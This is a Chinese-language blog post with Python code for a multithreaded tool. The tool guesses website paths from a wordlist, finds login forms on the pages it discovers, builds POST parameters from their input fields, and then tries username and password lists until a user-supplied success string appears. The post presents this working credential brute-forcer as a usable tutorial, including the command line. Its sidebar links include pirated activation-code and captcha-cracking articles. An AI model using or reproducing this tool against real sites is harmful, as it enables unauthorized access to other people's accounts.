编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径，采用字典爆破的形式，当然如果只是单纯的爆破路径，简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用，此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

首先就是路径爆破，采用多线程队列，爆破路径，判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理，方法实现了一个css选择器，获取form表单中的input字段标签，提取标签参数组合成post参数值，然后提取表单中的action跳转页面，如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后，交给payload方法处理登陆，采用requests库的session登陆。获取cookie，先采用session请求获取cookie后，再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功，采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容，更多关于python 破解表单的资料请关注三水点靠木其它相关文章！

python遍历路径破解表单的示例

- Author -

Misaki''s

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python实现的解析crontab配置文件代码

Jun 30 Python

python中的多线程实例教程

Aug 27 Python

分享Python文本生成二维码实例

Jan 06 Python

python图书管理系统

Apr 05 Python

对python numpy.array插入一行或一列的方法详解

Jan 29 Python

深度辨析Python的eval()与exec()的方法

Mar 26 Python

python3.4 将16进制转成字符串的实例

Jun 12 Python

python 3.7.4 安装 opencv的教程

Oct 10 Python

使用tensorboard可视化loss和acc的实例

Jan 21 Python

python 解决print数组/矩阵无法完整输出的问题

Feb 19 Python

python删除某个目录文件夹的方法

May 26 Python

基于pytorch中的Sequential用法说明

Jun 24 Python

Python如何批量生成和调用变量

Nov 21 #Python

在终端启动Python时报错的解决方案

Nov 20 #Python

python 批量下载bilibili视频的gui程序

Nov 20 #Python

Python ellipsis 的用法详解

Nov 20 #Python

python 动态渲染 mysql 配置文件的示例

Nov 20 #Python

Python paramiko使用方法代码汇总

Nov 20 #Python

分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功

Nov 20 #Python

You might like

关于Appserv无法打开localhost问题的解决方法

2009/10/16 PHP

fgetcvs在linux的问题

2012/01/15 PHP

thinkphp使用phpmailer发送邮件的方法

2014/11/24 PHP

CI框架表单验证实例详解

2016/11/21 PHP

JavaScript 异步调用框架 (Part 4 - 链式调用)

2009/08/04 Javascript

查询绑定数据岛的表格中的文本并修改显示方式的js代码

2009/12/15 Javascript

jQuery Ajax方法调用 Asp.Net WebService 的详细实例代码

2011/04/27 Javascript

读jQuery之八包装事件对象

2011/06/21 Javascript

js阻止事件追加的具体实现

2014/10/15 Javascript

jQuery中siblings()方法用法实例

2015/01/08 Javascript

Node.js 学习笔记之简介、安装及配置

2015/03/03 Javascript

AngularJS 单元测试（二）详解

2016/09/21 Javascript

JSON字符串和JSON对象相互转化实例详解

2017/01/05 Javascript

详解使用vue实现tab 切换操作

2017/07/03 Javascript

React-Native使用Mobx实现购物车功能

2017/09/14 Javascript

vue如何在自定义组件中使用v-model

2018/05/14 Javascript

使用vuepress搭建静态博客的示例代码

2019/02/14 Javascript

Vue实现穿梭框效果

2020/09/30 Javascript

Python使用迭代器捕获Generator返回值的方法

2017/04/05 Python

Python 获得13位unix时间戳的方法

2017/10/20 Python

实例讲解Python中整数的最大值输出

2019/03/17 Python

使用Python创建简单的HTTP服务器的方法步骤

2019/04/26 Python

Python如何使用k-means方法将列表中相似的句子归类

2019/08/08 Python

Python中使用filter过滤列表的一个小技巧分享

2020/05/02 Python

opencv 实现特定颜色线条提取与定位操作

2020/06/02 Python

Python面向对象实现方法总结

2020/08/12 Python

PyCharm 2020.1版安装破解注册码永久激活(激活到2089年)

2020/09/24 Python

python实现不同数据库间数据同步功能

2021/02/25 Python

外贸采购员求职的自我评价

2013/11/26 职场文书

企业党员个人自我评价

2014/09/20 职场文书

委托函范文

2015/01/29 职场文书

2015年信访工作总结

2015/04/07 职场文书

2015社区精神文明建设工作总结

2015/04/21 职场文书

毕业论文致谢部分怎么写

2015/05/14 职场文书

Python破解极验滑动验证码详细步骤

2021/05/21 Python

关于Vue中的options选项

2022/03/22 Vue.js